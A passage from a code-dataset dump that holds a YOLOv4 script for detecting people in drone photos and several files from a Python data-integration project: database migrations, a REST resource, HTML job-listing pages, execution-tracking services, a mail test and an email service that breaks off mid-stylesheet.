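A usage sketch for the module above; it requires the compiled `roi_align_rotated_cuda` extension, and the shapes follow the forward docstring:
```python
import torch
# one feature map, one rotated RoI: (batch_index, cx, cy, w, h, angle_degrees)
features = torch.randn(1, 256, 64, 64)
rois = torch.tensor([[0.0, 32.0, 32.0, 16.0, 8.0, 30.0]])
align = RoIAlignRotated(out_size=(7, 7), spatial_scale=1.0, sample_num=2)
pooled = align(features, rois)  # -> (1, 256, 7, 7)
```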
|
{
"source": "jedichen121/tensorflow-yolov4-tflite",
"score": 2
}
|
#### File: jedichen121/tensorflow-yolov4-tflite/drone_image_detect.py
```python
import os
import cv2
import time
os.environ['TF_CPP_MIN_LOG_LEVEL'] = '3'
import numpy as np
import tensorflow as tf
import core.utils as utils
from PIL import Image
from core.yolov4 import YOLOv4, YOLOv3, YOLOv3_tiny, YOLOv4_tiny, decode
from core.yolov4 import filter_boxes
from core.config import cfg
from absl import app, flags, logging
from absl.flags import FLAGS
from tensorflow.compat.v1 import ConfigProto
from tensorflow.compat.v1 import InteractiveSession
from tensorflow.python.saved_model import tag_constants
physical_devices = tf.config.experimental.list_physical_devices('GPU')
if len(physical_devices) > 0:
tf.config.experimental.set_memory_growth(physical_devices[0], True)
flags.DEFINE_string('framework', 'tf', '(tf, tflite, trt)')
flags.DEFINE_string('weights', './checkpoints/yolov4-tiny-416',
'path to weights file')
flags.DEFINE_integer('size', 416, 'resize images to')
flags.DEFINE_boolean('tiny', True, 'yolo or yolo-tiny')
flags.DEFINE_string('model', 'yolov4', 'yolov3 or yolov4')
flags.DEFINE_string('image', './data/kite.jpg', 'path to input image')
flags.DEFINE_string('output', 'result.png', 'path to output image')
flags.DEFINE_float('iou', 0.45, 'iou threshold')
flags.DEFINE_float('score', 0.25, 'score threshold')
def main(_argv):
config = ConfigProto()
config.gpu_options.allow_growth = True
session = InteractiveSession(config=config)
STRIDES, ANCHORS, NUM_CLASS, XYSCALE = utils.load_config(FLAGS)
input_size = FLAGS.size
image_path = FLAGS.image
image_folder = "./data/aerial_photos/"
# Find all png files within the given directory, sorted numerically
image_files = []
file_names = os.listdir(image_folder)
saved_model_loaded = tf.saved_model.load(FLAGS.weights, tags=[tag_constants.SERVING])
infer = saved_model_loaded.signatures['serving_default']
for file in file_names:
if ".JPG" in file:
# image_files.append(os.path.join(image_folder, file))
image_files.append(file)
image_files.sort(key=lambda f: int(''.join(filter(str.isdigit, f))))
for image in image_files[:]:
original_image = cv2.imread(os.path.join(image_folder, image))
original_image = cv2.cvtColor(original_image, cv2.COLOR_BGR2RGB)
original_image_size = original_image.shape[:2]
        # image_data = cv2.resize(original_image, (input_size, input_size))  # dead store: overwritten by the partial-image resize below
# image_data = utils.image_preprocess(np.copy(original_image), [input_size, input_size])
partial_image = original_image[int(original_image_size[0]/3):int(original_image_size[0]/3*2),
int(original_image_size[1]/3):int(original_image_size[1]/3*2), :]
# partial_image = original_image[int(original_image_size[0]/5*2):int(original_image_size[0]/5*3),
# int(original_image_size[1]/5*2):int(original_image_size[1]/5*3), :]
image_data = cv2.resize(partial_image, (input_size, input_size))
image_data = image_data / 255.
# image_data = image_data[np.newaxis, ...].astype(np.float32)
images_data = []
for i in range(1):
images_data.append(image_data)
images_data = np.asarray(images_data).astype(np.float32)
batch_data = tf.constant(images_data)
pred_bbox = infer(batch_data)
for key, value in pred_bbox.items():
boxes = value[:, :, 0:4]
pred_conf = value[:, :, 4:]
boxes, scores, classes, valid_detections = tf.image.combined_non_max_suppression(
boxes=tf.reshape(boxes, (tf.shape(boxes)[0], -1, 1, 4)),
scores=tf.reshape(
pred_conf, (tf.shape(pred_conf)[0], -1, tf.shape(pred_conf)[-1])),
max_output_size_per_class=50,
max_total_size=50,
iou_threshold=FLAGS.iou,
score_threshold=FLAGS.score
)
pred_bbox = [boxes.numpy(), scores.numpy(), classes.numpy(), valid_detections.numpy()]
# image = utils.draw_bbox(original_image, pred_bbox)
detect_person = False
_, out_scores, out_classes, num_boxes = pred_bbox
# print("num_boxes is ", num_boxes)
# print("out_class is ", out_classes)
for i in range(num_boxes[0]):
class_id = int(out_classes[0][i])
# print(class_id)
if class_id == 0:
detect_person = True
print('%s: %.2f' % (image, out_scores[0][i]))
break
if not detect_person:
print('%s: %.2f' % (image, 0))
# image = utils.draw_bbox(image_data*255, pred_bbox)
# image = Image.fromarray(image.astype(np.uint8))
# image.show()
# image = cv2.cvtColor(np.array(image), cv2.COLOR_BGR2RGB)
# cv2.imwrite(FLAGS.output, image)
if __name__ == '__main__':
try:
app.run(main)
except SystemExit:
pass
```
|
{
"source": "jedicontributors/pythondataintegrator",
"score": 2
}
|
#### File: alembic/versions/d0e0fa244e63_connection_queue.py
```python
from alembic import op
import sqlalchemy as sa
# revision identifiers, used by Alembic.
revision = 'd0e0fa244e63'
down_revision = '<KEY>'
branch_labels = None
depends_on = None
def insert_connection_types():
from models.dao.connection.ConnectionType import ConnectionType
from models.dao.connection.ConnectorType import ConnectorType
bind = op.get_bind()
from sqlalchemy import orm
session = orm.Session(bind=bind)
connection_type_list = [
{
"Name": "Queue",
}
]
connector_type_list = [
{
"ConnectionType": "Queue",
"Name": "Kafka",
}
]
connection_types = []
for connection_type_json in connection_type_list:
connection_type = ConnectionType(Name=connection_type_json["Name"])
connection_types.append(connection_type)
session.bulk_save_objects(connection_types)
session.commit()
connector_types = []
for connector_type_json in connector_type_list:
connection_type = session.query(ConnectionType).filter_by(Name=connector_type_json["ConnectionType"]).first()
connector_type = ConnectorType(Name=connector_type_json["Name"], ConnectionTypeId=connection_type.Id)
connector_types.append(connector_type)
session.bulk_save_objects(connector_types)
session.commit()
def insert_connection_server():
    from models.dao.connection import Connection, ConnectionServer
bind = op.get_bind()
from sqlalchemy import orm
session = orm.Session(bind=bind)
query = bind.execute('select dic."ConnectionId", dic."Host",dic."Port" from "Connection"."ConnectionDatabase" as dic')
results = query.fetchall()
for connection_database in results:
connection = session.query(Connection).filter_by(Id=connection_database[0]).first()
connection_server = ConnectionServer(Connection=connection,
Host=connection_database[1],
Port=connection_database[2])
session.add(connection_server)
session.commit()
def upgrade():
# ### commands auto generated by Alembic - please adjust! ###
op.create_table('ConnectionQueue',
sa.Column('Id', sa.Integer(), nullable=False),
sa.Column('ConnectionId', sa.Integer(), nullable=True),
sa.Column('ConnectorTypeId', sa.Integer(), nullable=True),
sa.Column('Protocol', sa.String(length=100), nullable=True),
sa.Column('Mechanism', sa.String(length=100), nullable=True),
sa.Column('CreatedByUserId', sa.Integer(), nullable=False),
sa.Column('CreationDate', sa.DateTime(), nullable=False),
sa.Column('LastUpdatedUserId', sa.Integer(), nullable=True),
sa.Column('LastUpdatedDate', sa.DateTime(), nullable=True),
sa.Column('IsDeleted', sa.Integer(), nullable=False),
sa.Column('Comments', sa.String(length=1000), nullable=True),
sa.Column('RowVersion', sa.TIMESTAMP(), nullable=True),
sa.ForeignKeyConstraint(['ConnectionId'], ['Connection.Connection.Id'], ),
sa.ForeignKeyConstraint(['ConnectorTypeId'], ['Connection.ConnectorType.Id'], ),
sa.PrimaryKeyConstraint('Id'),
schema='Connection'
)
op.create_table('ConnectionServer',
sa.Column('Id', sa.Integer(), nullable=False),
sa.Column('ConnectionId', sa.Integer(), nullable=True),
sa.Column('Host', sa.String(length=100), nullable=True),
sa.Column('Port', sa.Integer(), nullable=True),
sa.Column('CreatedByUserId', sa.Integer(), nullable=False),
sa.Column('CreationDate', sa.DateTime(), nullable=False),
sa.Column('LastUpdatedUserId', sa.Integer(), nullable=True),
sa.Column('LastUpdatedDate', sa.DateTime(), nullable=True),
sa.Column('IsDeleted', sa.Integer(), nullable=False),
sa.Column('Comments', sa.String(length=1000), nullable=True),
sa.Column('RowVersion', sa.TIMESTAMP(), nullable=True),
sa.ForeignKeyConstraint(['ConnectionId'], ['Connection.Connection.Id'], ),
sa.PrimaryKeyConstraint('Id'),
schema='Connection'
)
insert_connection_server()
op.drop_column('ConnectionDatabase', 'Host', schema='Connection')
op.drop_column('ConnectionDatabase', 'Port', schema='Connection')
op.drop_column('ConnectionFile', 'Host', schema='Connection')
op.drop_column('ConnectionFile', 'Port', schema='Connection')
insert_connection_types()
# ### end Alembic commands ###
def downgrade():
# ### commands auto generated by Alembic - please adjust! ###
op.add_column('ConnectionFile', sa.Column('Port', sa.INTEGER(), autoincrement=False, nullable=True), schema='Connection')
op.add_column('ConnectionFile', sa.Column('Host', sa.VARCHAR(length=100), autoincrement=False, nullable=True), schema='Connection')
op.add_column('ConnectionDatabase', sa.Column('Port', sa.INTEGER(), autoincrement=False, nullable=True), schema='Connection')
op.add_column('ConnectionDatabase', sa.Column('Host', sa.VARCHAR(length=100), autoincrement=False, nullable=True), schema='Connection')
op.drop_table('ConnectionServer', schema='Connection')
op.drop_table('ConnectionQueue', schema='Connection')
# ### end Alembic commands ###
```
#### File: alembic/versions/e50ccd73d9c9_data_integration_connections.py
```python
from alembic import op
import sqlalchemy as sa
# revision identifiers, used by Alembic.
revision = '<KEY>'
down_revision = '<KEY>'
branch_labels = None
depends_on = None
def insert_data_integration_connection_to_database():
    from models.dao.integration import DataIntegrationConnection, DataIntegrationConnectionDatabase
bind = op.get_bind()
from sqlalchemy import orm
session = orm.Session(bind=bind)
query = bind.execute('select dic."Id", dic."Schema",dic."TableName",dic."Query" from "Integration"."DataIntegrationConnection" as dic')
results = query.fetchall()
for data_integration_connection_data in results:
data_integration_connection = session.query(DataIntegrationConnection).filter_by(Id=data_integration_connection_data[0]).first()
data_integration_connection_database = DataIntegrationConnectionDatabase(DataIntegrationConnection=data_integration_connection,
Schema=data_integration_connection_data[1],
TableName=data_integration_connection_data[2],
Query=data_integration_connection_data[3])
session.add(data_integration_connection_database)
session.commit()
def upgrade():
# ### commands auto generated by Alembic - please adjust! ###
op.create_table('DataIntegrationConnectionDatabase',
sa.Column('Id', sa.Integer(), nullable=False),
sa.Column('DataIntegrationConnectionId', sa.Integer(), nullable=True),
sa.Column('Schema', sa.String(length=100), nullable=True),
sa.Column('TableName', sa.String(length=100), nullable=True),
sa.Column('Query', sa.Text(), nullable=True),
sa.Column('CreatedByUserId', sa.Integer(), nullable=False),
sa.Column('CreationDate', sa.DateTime(), nullable=False),
sa.Column('LastUpdatedUserId', sa.Integer(), nullable=True),
sa.Column('LastUpdatedDate', sa.DateTime(), nullable=True),
sa.Column('IsDeleted', sa.Integer(), nullable=False),
sa.Column('Comments', sa.String(length=1000), nullable=True),
sa.Column('RowVersion', sa.TIMESTAMP(), nullable=True),
sa.ForeignKeyConstraint(['DataIntegrationConnectionId'], ['Integration.DataIntegrationConnection.Id'], ),
sa.PrimaryKeyConstraint('Id'),
schema='Integration'
)
insert_data_integration_connection_to_database()
op.drop_column('DataIntegrationConnection', 'TableName', schema='Integration')
op.drop_column('DataIntegrationConnection', 'Schema', schema='Integration')
op.drop_column('DataIntegrationConnection', 'Query', schema='Integration')
# ### end Alembic commands ###
def downgrade():
# ### commands auto generated by Alembic - please adjust! ###
op.add_column('DataIntegrationConnection', sa.Column('Query', sa.TEXT(), autoincrement=False, nullable=True), schema='Integration')
op.add_column('DataIntegrationConnection', sa.Column('Schema', sa.VARCHAR(length=100), autoincrement=False, nullable=True), schema='Integration')
op.add_column('DataIntegrationConnection', sa.Column('TableName', sa.VARCHAR(length=100), autoincrement=False, nullable=True), schema='Integration')
op.drop_table('DataIntegrationConnectionDatabase', schema='Integration')
# ### end Alembic commands ###
```
#### File: controllers/operation/DataOperationResource.py
```python
import json
from infrastructor.json.JsonConvert import JsonConvert
from injector import inject
from controllers.common.models.CommonModels import CommonModels
from controllers.operation.models.DataOperationModels import DataOperationModels
from domain.operation.services.DataOperationService import DataOperationService
from IocManager import IocManager
from infrastructor.api.ResourceBase import ResourceBase
from models.viewmodels.operation.CreateDataOperationModel import CreateDataOperationModel
@DataOperationModels.ns.route("")
class DataOperationResource(ResourceBase):
@inject
def __init__(self, data_operation_service: DataOperationService,
*args, **kwargs):
super().__init__(*args, **kwargs)
self.data_operation_service = data_operation_service
@DataOperationModels.ns.marshal_with(CommonModels.SuccessModel)
def get(self):
"""
Get All Data Operations
"""
entities = self.data_operation_service.get_data_operations()
result = DataOperationModels.get_data_operation_result_models(entities)
return CommonModels.get_response(result=result)
@DataOperationModels.ns.expect(DataOperationModels.create_data_operation_model, validate=True)
@DataOperationModels.ns.marshal_with(CommonModels.SuccessModel)
def post(self):
"""
Data Operation definition
"""
data: CreateDataOperationModel = JsonConvert.FromJSON(json.dumps(IocManager.api.payload))
creation_result = self.data_operation_service.post_data_operation(
data_operation_model=data,
definition_json=JsonConvert.ToJSON(data))
result = DataOperationModels.get_data_operation_result_model(creation_result)
return CommonModels.get_response(result=result)
@DataOperationModels.ns.expect(DataOperationModels.delete_data_operation_model, validate=True)
@DataOperationModels.ns.marshal_with(CommonModels.SuccessModel)
def delete(self):
"""
Delete Existing Data Operation
"""
data = IocManager.api.payload
        entity_id = data.get('Id')
        self.data_operation_service.delete_data_operation(entity_id)
        return CommonModels.get_response(message="Data Operation removed successfully")
```
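As a quick smoke test, the resource can be exercised through a Flask test client, bootstrapped the same way the unit tests do. The sketch below is illustrative only: the `/api/DataOperation` route prefix and the delete payload shape are assumptions, not confirmed by this file.
```python
# Hypothetical smoke test; the route prefix and payload fields are assumptions.
import json
import os
from IocManager import IocManager
from infrastructor.api.FlaskAppWrapper import FlaskAppWrapper

os.environ["PYTHON_ENVIRONMENT"] = 'test'
IocManager.set_app_wrapper(app_wrapper=FlaskAppWrapper)
IocManager.initialize()
client = IocManager.app.test_client()

# list all data operations
response = client.get('/api/DataOperation')
print(response.status_code, response.get_data(as_text=True))

# remove one by Id (body shape assumed to follow delete_data_operation_model)
response = client.delete('/api/DataOperation',
                         data=json.dumps({'Id': 1}),
                         content_type='application/json')
print(response.status_code)
```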
#### File: operation/page/DataOperationJobExecutionPage.py
```python
from injector import inject
from sqlalchemy import func
from domain.page.HtmlTemplateService import HtmlTemplateService, Pagination
from infrastructor.data.RepositoryProvider import RepositoryProvider
from infrastructor.dependency.scopes import IScoped
from models.dao.operation import DataOperationJob, DataOperationJobExecution, \
DataOperationJobExecutionIntegration, DataOperationJobExecutionIntegrationEvent
class DataOperationJobExecutionPage(IScoped):
@inject
def __init__(self, repository_provider: RepositoryProvider, html_template_service: HtmlTemplateService):
super().__init__()
self.repository_provider = repository_provider
self.html_template_service = html_template_service
def render_job_execution(self, pagination):
headers = [
{'value': 'Execution Id'},
{'value': 'Job Id'},
{'value': 'Name'},
{'value': 'Schedule Info'},
{'value': 'Status'},
{'value': 'Log'},
{'value': 'Source Data Count'},
{'value': 'Affected Row Count'},
{'value': 'Execution Start Date'},
{'value': 'Execution End Date'}
]
def prepare_row(data: DataOperationJobExecution):
max_id = self.repository_provider.database_session_manager.session.query(
func.max(DataOperationJobExecutionIntegration.Id)) \
.filter(DataOperationJobExecutionIntegration.DataOperationJobExecutionId == data.Id)
error_integration = self.repository_provider.get(DataOperationJobExecutionIntegration).first(Id=max_id)
error_log = ''
if error_integration is not None and error_integration.Log is not None:
error_log = error_integration.Log.replace('\n', '<br />').replace('\t',
' ')
total_source_data_count = self.repository_provider.database_session_manager.session.query(
func.sum(DataOperationJobExecutionIntegration.SourceDataCount).label("SourceDataCount")) \
.filter(DataOperationJobExecutionIntegration.DataOperationJobExecutionId == data.Id).first()[0]
if total_source_data_count is None or total_source_data_count < 0:
total_source_data_count = 0
total_affected_row = self.repository_provider.database_session_manager.session.query(
func.sum(DataOperationJobExecutionIntegrationEvent.AffectedRowCount).label("AffectedRowCount")) \
.join(DataOperationJobExecutionIntegration.DataOperationJobExecutionIntegrationEvents) \
.filter(DataOperationJobExecutionIntegration.DataOperationJobExecutionId == data.Id).first()[0]
if total_affected_row is None or total_affected_row < 0:
total_affected_row = 0
end_date = ''
if data.EndDate is not None:
end_date = data.EndDate.strftime('%d.%m.%Y-%H:%M:%S.%f')[:-3]
row = {
'data':
[
{'value': f'<a href="/DataOperation/Job/Execution/{data.Id}">{data.Id}</a>-<a href="/DataOperation/Job/Execution/Log/{data.Id}">log</a>'},
{
'value': f'<a href="/DataOperation/Job/{data.DataOperationJob.Id}">{data.DataOperationJob.Id}</a>'},
{
'value': f'<a href="/DataOperation/{data.DataOperationJob.DataOperation.Id}">{data.DataOperationJob.DataOperation.Name}({data.DataOperationJob.DataOperation.Id})</a>'},
{
'value': f'{data.DataOperationJob.Cron}({data.DataOperationJob.StartDate}-{data.DataOperationJob.EndDate})'},
{'value': data.Status.Description},
{'value': error_log},
{'value': total_source_data_count},
{'value': total_affected_row},
{'value': data.StartDate.strftime('%d.%m.%Y-%H:%M:%S.%f')[:-3],
'class': 'mail-row-nowrap'},
{'value': end_date,
'class': 'mail-row-nowrap'}
]
}
return row
data_operation_job_execution_repository = self.repository_provider.get(DataOperationJobExecution)
query = data_operation_job_execution_repository.table
pagination.PageUrl = '/DataOperation/Job/Execution{}'
table_data = self.html_template_service.prepare_table_data_dynamic(query=query,
headers=headers,
prepare_row=prepare_row,
sortable='"Id" desc',
pagination=pagination)
table = self.html_template_service.render_table(source=table_data)
return table
def render(self, pagination: Pagination):
if pagination is None:
pagination = Pagination(Limit=50)
elif pagination.Limit is None:
pagination.Limit = 50
table_job = self.render_job_execution(pagination)
return self.html_template_service.render_html(
content=f''' <div style="font-size: 24px;"><b>Job Executions </b></div>{table_job}''')
```
#### File: operation/page/DataOperationJobPage.py
```python
import json
from injector import inject
from domain.page.HtmlTemplateService import HtmlTemplateService, Pagination
from infrastructor.data.RepositoryProvider import RepositoryProvider
from infrastructor.dependency.scopes import IScoped
from models.dao.operation import DataOperationJob, DataOperation
class DataOperationJobPage(IScoped):
@inject
def __init__(self, repository_provider: RepositoryProvider, html_template_service: HtmlTemplateService):
super().__init__()
self.repository_provider = repository_provider
self.html_template_service = html_template_service
def render_job(self, pagination):
headers = [
{'value': 'Id'},
{'value': 'JobId'},
{'value': 'Name'},
{'value': 'Contacts'},
{'value': 'Next Run Time'},
{'value': 'Cron'},
{'value': 'Start Date'},
{'value': 'End Date'},
{'value': 'Creation Date'},
{'value': 'Last Update Date'},
{'value': 'Is Deleted'},
{'value': 'Definition'}
]
def prepare_row(data):
data_operation_job = data.DataOperationJob
last_update_date = None
if data_operation_job.LastUpdatedDate is not None:
last_update_date = data_operation_job.LastUpdatedDate.strftime('%d.%m.%Y-%H:%M:%S.%f')[:-3]
next_run_time = '-'
if data_operation_job.ApSchedulerJob is not None and data_operation_job.ApSchedulerJob.NextRunTime is not None:
next_run_time = data_operation_job.ApSchedulerJob.NextRunTime
            contacts = []
            if data_operation_job.DataOperation.Contacts is not None and len(data_operation_job.DataOperation.Contacts) > 0:
                for contact in data_operation_job.DataOperation.Contacts:
                    contacts.append(contact.Email)
            contact_str = ';'.join(contacts)
            op_def = ''
            if data_operation_job.Cron is not None:
                definition = {
                    "OperationName": data_operation_job.DataOperation.Name,
                    "Cron": data_operation_job.Cron
                }
                op_def = json.dumps(definition, indent=4)
row = {
"data": [
{'value': f'<a href="/DataOperation/Job/{data_operation_job.Id}">{data_operation_job.Id}</a>'},
{'value': data_operation_job.ApSchedulerJobId},
{
'value': f'<a href="/DataOperation/{data_operation_job.DataOperation.Id}">{data_operation_job.DataOperation.Name}({data_operation_job.DataOperation.Id})</a>'},
{'value': contact_str},
{'value': next_run_time},
{'value': data_operation_job.Cron},
{'value': data_operation_job.StartDate},
{'value': data_operation_job.EndDate},
{'value': data_operation_job.CreationDate.strftime('%d.%m.%Y-%H:%M:%S.%f')[:-3],
'class': 'row-nowrap'},
{'value': last_update_date, 'class': 'row-nowrap'},
{'value': data_operation_job.IsDeleted},
{'value': f'''{op_def}'''},
]
}
return row
data_operation_repository = self.repository_provider.get(DataOperationJob)
query = data_operation_repository.database_session_manager.session.query(DataOperationJob,
DataOperation.Name).join(
DataOperationJob.DataOperation)
if pagination.Filter is not None and pagination.Filter != '':
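            # SQLAlchemy needs "!= None" (not "is not None") in the Cron filters below
            # so the comparison compiles to an IS NOT NULL clause.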
if pagination.Filter == '0':
query = query.filter(DataOperationJob.Cron != None)
query = query.filter(DataOperationJob.IsDeleted == 0)
elif pagination.Filter == '1':
query = query.filter(DataOperationJob.Cron != None)
elif pagination.Filter == '2':
query = query.filter(DataOperationJob.IsDeleted == 0)
else:
query = query.filter(DataOperation.Name.ilike(f'%{pagination.Filter}%'))
pagination.PageUrl = '/DataOperation/Job{}'
table_data = self.html_template_service.prepare_table_data_dynamic(query=query,
headers=headers,
prepare_row=prepare_row,
sortable='"DataOperationJob"."Id" desc',
pagination=pagination)
table = self.html_template_service.render_table(source=table_data)
return table
def render(self, pagination: Pagination):
if pagination is None:
pagination = Pagination(Limit=50)
elif pagination.Limit is None:
pagination.Limit = 50
table_job = self.render_job(pagination)
return self.html_template_service.render_html(
content=f''' <div style="font-size: 24px;"><b>Jobs </b></div>{table_job}''')
```
#### File: operation/services/DataOperationJobExecutionIntegrationService.py
```python
from datetime import datetime
from injector import inject
from infrastructor.data.DatabaseSessionManager import DatabaseSessionManager
from infrastructor.data.Repository import Repository
from infrastructor.dependency.scopes import IScoped
from models.dao.common import OperationEvent
from models.dao.common.Status import Status
from models.dao.operation import DataOperationJobExecution, DataOperationJobExecutionIntegration, \
DataOperationJobExecutionIntegrationEvent, DataOperationIntegration
from models.enums.events import EVENT_EXECUTION_INTEGRATION_INITIALIZED
class DataOperationJobExecutionIntegrationService(IScoped):
@inject
def __init__(self,
database_session_manager: DatabaseSessionManager,
):
self.database_session_manager = database_session_manager
self.data_operation_job_execution_repository: Repository[DataOperationJobExecution] = Repository[
DataOperationJobExecution](database_session_manager)
self.status_repository: Repository[Status] = Repository[Status](database_session_manager)
self.operation_event_repository: Repository[OperationEvent] = Repository[
OperationEvent](database_session_manager)
self.data_operation_job_execution_integration_repository: Repository[DataOperationJobExecutionIntegration] = \
Repository[
DataOperationJobExecutionIntegration](database_session_manager)
self.data_operation_job_execution_integration_event_repository: Repository[
DataOperationJobExecutionIntegrationEvent] = Repository[
DataOperationJobExecutionIntegrationEvent](database_session_manager)
def create(self, data_operation_job_execution_id,
data_operation_integration: DataOperationIntegration):
data_operation_job_execution = self.data_operation_job_execution_repository.first(
Id=data_operation_job_execution_id)
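        # NOTE: status Id=1 is assumed to be the initial "started" row seeded in the Status table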
status = self.status_repository.first(Id=1)
data_operation_job_execution_integration = DataOperationJobExecutionIntegration(
DataOperationJobExecution=data_operation_job_execution,
DataOperationIntegration=data_operation_integration,
Status=status,
Limit=data_operation_integration.Limit,
ProcessCount=data_operation_integration.ProcessCount)
self.data_operation_job_execution_integration_repository.insert(data_operation_job_execution_integration)
operation_event = self.operation_event_repository.first(Code=EVENT_EXECUTION_INTEGRATION_INITIALIZED)
data_operation_job_execution_integration_event = DataOperationJobExecutionIntegrationEvent(
EventDate=datetime.now(),
DataOperationJobExecutionIntegration=data_operation_job_execution_integration,
Event=operation_event)
self.data_operation_job_execution_integration_event_repository.insert(
data_operation_job_execution_integration_event)
self.database_session_manager.commit()
return data_operation_job_execution_integration
def update_status(self,
data_operation_job_execution_integration_id: int = None,
status_id: int = None, is_finished: bool = False):
data_operation_job_execution_integration = self.data_operation_job_execution_integration_repository.first(
Id=data_operation_job_execution_integration_id)
status = self.status_repository.first(Id=status_id)
if is_finished:
data_operation_job_execution_integration.EndDate = datetime.now()
data_operation_job_execution_integration.Status = status
self.database_session_manager.commit()
return data_operation_job_execution_integration
def update_source_data_count(self,
data_operation_job_execution_integration_id: int = None,
source_data_count=None):
data_operation_job_execution_integration = self.data_operation_job_execution_integration_repository.first(
Id=data_operation_job_execution_integration_id)
data_operation_job_execution_integration.SourceDataCount = source_data_count
self.database_session_manager.commit()
return data_operation_job_execution_integration
def update_log(self,
data_operation_job_execution_integration_id: int = None,
log=None):
data_operation_job_execution_integration = self.data_operation_job_execution_integration_repository.first(
Id=data_operation_job_execution_integration_id)
data_operation_job_execution_integration.Log = log[0:1000]
self.database_session_manager.commit()
return data_operation_job_execution_integration
def create_event(self, data_operation_execution_integration_id,
event_code,
affected_row=None) -> DataOperationJobExecutionIntegrationEvent:
data_operation_job_execution_integration = self.data_operation_job_execution_integration_repository.first(
Id=data_operation_execution_integration_id)
operation_event = self.operation_event_repository.first(Code=event_code)
data_operation_job_execution_integration_event = DataOperationJobExecutionIntegrationEvent(
EventDate=datetime.now(),
AffectedRowCount=affected_row,
DataOperationJobExecutionIntegration=data_operation_job_execution_integration,
Event=operation_event)
self.data_operation_job_execution_integration_event_repository.insert(
data_operation_job_execution_integration_event)
self.database_session_manager.commit()
        return data_operation_job_execution_integration_event
```
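Taken together, these methods form the write path for a single integration run: `create` opens the tracking record, the `update_*` methods mutate it as work progresses, and `create_event` appends audit rows. A minimal sketch of that lifecycle, assuming the service is resolved from the injector and that the ids and status code used here are placeholder values:
```python
# Hypothetical lifecycle walk-through; ids, status codes, and the fetched
# DataOperationIntegration row are assumptions for illustration only.
from IocManager import IocManager
from domain.operation.services.DataOperationJobExecutionIntegrationService import \
    DataOperationJobExecutionIntegrationService
from infrastructor.data.Repository import Repository
from models.dao.operation import DataOperationIntegration

service = IocManager.injector.get(DataOperationJobExecutionIntegrationService)
integration_repository = Repository[DataOperationIntegration](service.database_session_manager)
data_operation_integration = integration_repository.first(Id=1)  # assumed row

execution_integration = service.create(
    data_operation_job_execution_id=42,  # assumed execution id
    data_operation_integration=data_operation_integration)
service.update_source_data_count(
    data_operation_job_execution_integration_id=execution_integration.Id,
    source_data_count=1000)
service.update_status(
    data_operation_job_execution_integration_id=execution_integration.Id,
    status_id=3, is_finished=True)  # status 3 assumed to mean "finished"
```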
#### File: unittests/delivery/test_mail_sending.py
```python
import os
from unittest import TestCase
from IocManager import IocManager
from infrastructor.delivery.EmailProvider import EmailProvider
class TestMailSending(TestCase):
def __init__(self, method_name='TestMailSending'):
super(TestMailSending, self).__init__(method_name)
from infrastructor.api.FlaskAppWrapper import FlaskAppWrapper
os.environ["PYTHON_ENVIRONMENT"] = 'test'
IocManager.set_app_wrapper(app_wrapper=FlaskAppWrapper)
IocManager.initialize()
self.client = IocManager.app.test_client()
    def print_error_detail(self, data):
        print(data['message'] if 'message' in data else '')
        print(data['traceback'] if 'traceback' in data else '')
    def test_send_mail(self):
        email_provider = IocManager.injector.get(EmailProvider)
        email_provider.send(["<EMAIL>"], "test", "test")
```
#### File: connection/services/ConnectionDatabaseService.py
```python
from injector import inject
from domain.connection.services.ConnectorTypeService import ConnectorTypeService
from infrastructor.cryptography.CryptoService import CryptoService
from infrastructor.data.DatabaseSessionManager import DatabaseSessionManager
from infrastructor.data.Repository import Repository
from infrastructor.dependency.scopes import IScoped
from infrastructor.exceptions.OperationalException import OperationalException
from models.dao.connection.Connection import Connection
from models.dao.connection.ConnectionDatabase import ConnectionDatabase
from models.viewmodels.connection.CreateConnectionDatabaseModel import CreateConnectionDatabaseModel
class ConnectionDatabaseService(IScoped):
@inject
def __init__(self,
database_session_manager: DatabaseSessionManager,
connector_type_service: ConnectorTypeService
):
self.connector_type_service = connector_type_service
self.database_session_manager = database_session_manager
self.connection_database_repository: Repository[ConnectionDatabase] = Repository[ConnectionDatabase](
database_session_manager)
def create(self, connection: Connection, model: CreateConnectionDatabaseModel) -> ConnectionDatabase:
"""
Create Database connection
"""
connector_type = self.connector_type_service.get_by_name(name=model.ConnectorTypeName)
if connector_type is None:
raise OperationalException(f"{model.ConnectorTypeName} not found")
if connector_type.ConnectionTypeId != connection.ConnectionTypeId:
raise OperationalException(f"{model.ConnectorTypeName} incompatible with {connection.ConnectionType.Name}")
connection_database = ConnectionDatabase(Connection=connection,
ConnectorType=connector_type,
Sid=model.Sid,
ServiceName=model.ServiceName,
DatabaseName=model.DatabaseName)
self.connection_database_repository.insert(connection_database)
return connection_database
def update(self, connection: Connection, model: CreateConnectionDatabaseModel) -> ConnectionDatabase:
"""
Update Database connection
"""
connection_database = self.connection_database_repository.first(ConnectionId=connection.Id)
connector_type = self.connector_type_service.get_by_name(name=model.ConnectorTypeName)
if connector_type is None:
raise OperationalException(f"{model.ConnectorTypeName} not found")
if connector_type.ConnectionTypeId != connection.ConnectionTypeId:
raise OperationalException(f"{model.ConnectorTypeName} incompatible with {connection.ConnectionType.Name}")
connection_database.ConnectorType = connector_type
connection_database.Sid = model.Sid
connection_database.ServiceName = model.ServiceName
connection_database.DatabaseName = model.DatabaseName
return connection_database
def delete(self, id: int):
"""
Delete Database connection
"""
self.connection_database_repository.delete_by_id(id)
```
#### File: domain/delivery/EmailService.py
```python
from typing import List
from injector import inject
from infrastructor.configuration.ConfigService import ConfigService
from infrastructor.data.DatabaseSessionManager import DatabaseSessionManager
from infrastructor.delivery.EmailProvider import EmailProvider
from infrastructor.dependency.scopes import IScoped
from infrastructor.logging.SqlLogger import SqlLogger
from models.configs.ApplicationConfig import ApplicationConfig
class EmailService(IScoped):
@inject
def __init__(self,
database_session_manager: DatabaseSessionManager,
sql_logger: SqlLogger,
email_provider: EmailProvider,
config_service: ConfigService,
application_config: ApplicationConfig
):
self.application_config: ApplicationConfig = application_config
self.database_session_manager = database_session_manager
self.sql_logger: SqlLogger = sql_logger
self.email_provider = email_provider
self.config_service = config_service
@property
def default_css(self):
return '''
.wrapper{
margin: 0 auto;
padding: 20px;
max-width: 1000px;
}
.container600 {
width: 300px;
max-width: 100%;
}
@media all and (max-width: 600px) {
.container600 {
width: 100% !important;
}
}
.col49 {
width: 49%;
}
.col2 {
width: 2%;
}
.col50 {
width: 50%;
}
@media all and (max-width: 599px) {
.fluid {
width: 100% !important;
}
.reorder {
width: 100% !important;
margin: 0 auto 10px;
}
.ghost-column {
display:none;
height:0;
width:0;
overflow:hidden;
max-height:0;
max-width:0;
}
}
.mail-column{
text-align: left;
padding:4px;
